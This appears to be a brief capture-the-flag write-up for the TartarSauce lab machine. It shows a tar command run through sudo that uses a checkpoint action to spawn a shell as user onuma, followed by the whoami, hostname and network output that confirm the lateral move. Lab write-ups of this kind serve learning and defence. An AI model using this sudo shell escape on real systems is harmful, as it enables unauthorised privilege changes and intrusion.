TartarSauce_Lateral_Movement

onuma

---

www-data@tartarsauce:/var/www$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh 
tar: Removing leading `/' from member names
$ whoami
whoami
onuma
$ hostname
hostname
TartarSauce
$ ifconfig
ifconfig
ens192    link encap:Ethernet  HWaddr 00:50:56:b9:55:4f  
          inet addr:10.10.10.88  Bcast:10.10.10.255  Mask:255.255.255.0
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:1290475 errors:0 dropped:19 overruns:0 frame:0
          tx packets:1284969 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:277025474 (277.0 MB)  TX bytes:604592653 (604.5 MB)
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          up loopback running  mtu:65536  Metric:1
          rx packets:20392 errors:0 dropped:0 overruns:0 frame:0
          tx packets:20392 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:1515648 (1.5 MB)  TX bytes:1515648 (1.5 MB)

Following up the sudo privileges of the www-data user, I made a lateral movement to the onuma user